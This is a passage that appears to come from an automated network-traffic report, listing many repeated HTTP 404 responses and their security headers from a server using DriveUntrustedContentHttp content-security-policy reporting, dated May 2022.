                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zETi9qQkiXP1wmYXWNUy/w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ew8xfpwUT3jdzyf40w6RgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:53 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5qHsxeEV9/Tzt5jWGZ0FZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:54 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-uqoUDkeFuuiaLH7HH40Iew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:54 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uFte/mybb6Db9PVH6aZRBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:54 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-G1XyBrJPwVlniqZ4PcRy8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:54 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8l93n3uJ6aEPDA5m2b1p1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:54 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UYSHMXCZkZv4s0Lbp23Neg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:54 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CDWpTKC1TUQ8eIrPkJLRlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5mOBa/kGIhDJylvlVtnSTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vBPdZNPOUEwxi9cGvFa4yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pE4Wmv5Kj+TLHYsfXcc0SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U9HTbBS66xT7nrk25sI6dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FDPXfx3pB9UyHBItt374Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-z7wUyXqVxfvhoI4zsj2okg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-U6Nca7zbsq8CylF/jaPrYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:55 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-dHRGMOiMu214pwBled1i8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-R6qsgZgtKD+yleGnOMAszg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-84VrpbahmnMPFeGwuwGPhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:56 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Kfl1EHKXWD2blZOoBHUgNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, 